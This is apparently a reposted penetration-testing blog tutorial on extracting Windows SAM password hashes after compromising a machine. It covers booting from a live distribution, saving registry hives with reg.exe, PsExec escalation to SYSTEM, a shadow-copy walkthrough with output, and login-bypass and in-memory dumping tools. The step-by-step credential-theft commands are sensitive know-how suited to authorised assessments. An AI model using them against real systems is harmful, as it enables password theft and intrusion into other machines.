Slightly modified definition from Wikipedia: Generally, dumping operating system users' password hashes is a common action following a compromise of a machine: getting access to the password hashes might open the doors to a variety of attacks including, but not limited to, authenticate with the hash over SMB to other systems where passwords are reused, password policy analysis and pattern recognition, password cracking, etc. Depending on the type of access that you have got to the target, you can retrieve the password hashes from SAM in different ways. Physical access Given physical access to the system, typically during a laptop assessment or a successful social engineering engagement, the preferred way to safely dump the password hashes is to power off the machine, enter the BIOS menu at power-on time, review the boot order to allow boot from the optical drive and USB drive before local hard-disk, save the settings and reboot the system with your favourite GNU/Linux live distribution CD or USB stick. Two widely known tools to dump the local users' hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2: bkhive - dumps the syskey bootkey from a Windows system hive. samdump2 - dumps Windows 2k/NT/XP/Vista password hashes. These tools are generally included in many GNU/Linux live distributions. If they're not, make sure to bring a copy of them with you. Usage: # bkhive bkhive 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it Usage: bkhive systemhive keyfile # samdump2 samdump2 1.1.1 by Objectif Securite http://www.objectif-securite.ch original author: ncuomo@studenti.unina.it /CODE] Usage: [CODE]samdump2 samhive keyfile Example of retrieving the SAM hashes from a Windows partition /dev/sda1: # mkdir -p /mnt/sda1 # mount /dev/sda1 /mnt/sda1 # bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt # samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt In the event that you have not got bkhive or samdump2 with you, you can fall-back to copy the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and import them to any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools. Bypass login prompt If you are looking into bypassing the login prompt rather than dumping users' password hashes, some smart people have came up with innovative approaches: BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology. SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the "create CD from ISO image" feature of your preferred CD burning software to create a bootable SysRq CD. Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows to log into a linux system as root user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password. Password reset Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user's credentials. Post-exploitation scenario The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals' PsExec utility: C:\>psexec.exe -i -s cmd.exe Although, there are several other techniques too, but this is outside of the scope of this post. Legacy techniques On Windows NT and Windows 2000 systems you can use MSbackup utility part of the MS-DOS subsystem: Backup the system state into a file locally on the machine you have compromised, then using MSbackup again, restore the system state stuff to a local directory without preserving the security. Once complete, you will have the SAM and SYSTEM files. You need about 280Mb for the initial backup - typical for a Windows 2000 with current service packs and hot fixes. Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files: C:\>regback.exe C:\backtemp\SAM machine sam C:\>regback.exe C:\backtemp\SYSTEM machine system If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exe. Using reg.exe: C:\>reg.exe save HKLM\SAM sam The operation completed successfully C:\>reg.exe save HKLM\SYSTEM sys The operation completed successfully Using regedit.exe: Execute regedit.exe from Start / Run prompt. Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export. Change the Save as type setting to Registry Hive Files and save as SAM. Same steps with SYSTEM hive. Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. Although this directory contains outdated copies of the original C:\Windows\System32\config\ files so it might not reflect the current users' credentials. Volume Shadow Copies technique This technique is fairly recent and was first illustrated by Tim Tomes. It consists of abusing the Volume Shadow Copies functionality in modern Windows operating systems to access protected system files like C:\Windows\System32\config's SAM and SYSTEM. You can use the Volume Shadow Copy Management command line interface, vssown, to leverage this technique as follows. List shadow copies: C:\>cscript vssown.vbs /list Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. SHADOW COPIES ============= As expected, no shadow copies initially. Verify the status of the Volume Shadow Service (VSS): C:\>cscript vssown.vbs /status Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. [*] Stopped C:\>cscript vssown.vbs /mode Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. [*] VSS service set to 'Manual' start mode. In this case, once we are done, we need to restore it to the initial state (Stopped). Create a new shadow copy: C:\>cscript vssown.vbs /create Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. [*] Attempting to create a shadow copy. Verify that the shadow copy has been created: C:\>cscript vssown.vbs /list Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. SHADOW COPIES ============= [*] ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853} [*] Client accessible: True [*] Count: 1 [*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 [*] Differnetial: True [*] Exposed locally: False [*] Exposed name: [*] Exposed remotely: False [*] Hardware assisted: False [*] Imported: False [*] No auto release: True [*] Not surfaced: False [*] No writers: True [*] Originating machine: LAPTOP [*] Persistent: True [*] Plex: False [*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5} [*] Service machine: LAPTOP [*] Set ID: {018D7854-5A28-42AE-8B10-99138C37112F} [*] State: 12 [*] Transportable: False [*] Volume name: \\?\Volume{46f5ef63-8cca-11e0-88ac-806e6f6e6963}\ You need to take note of the Device object value for the next step and the ID for the cleanup step. Pull the following files from a shadow copy: C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM . You have just copied over SAM and SYSTEM files from the shadow copy to the C:\ root folder. Cleanup: C:\>cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853} Microsoft (R) Windows Script Host Version 5.8Copyright (C) Microsoft Corporation. All rights reserved. [*] Attempting to delete shadow copy with ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853} Eventually, restore to original Stop status: C:\>cscript vssown.vbs /stop Microsoft (R) Windows Script Host Version 5.8Copyright (C) Microsoft Corporation. All rights reserved. [*] Signal sent to stop the VSS service. In-memory technique The concept behind in-memory dump of SAM hashes it to inject a DLL into the LSASS system process or, generally speaking, parsing the memory for specific patterns and inspect these memory pages' content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required. The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. The former works on both 32-bit and 64-bit systems across all versions of Windows, but has some problems when run on domain controllers and the latter does not work on 64-bit systems, but is reliable against modern Windows operating systems including Windows Server 2008 domain controllers 32-bit. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin. The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore. Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet. Sursa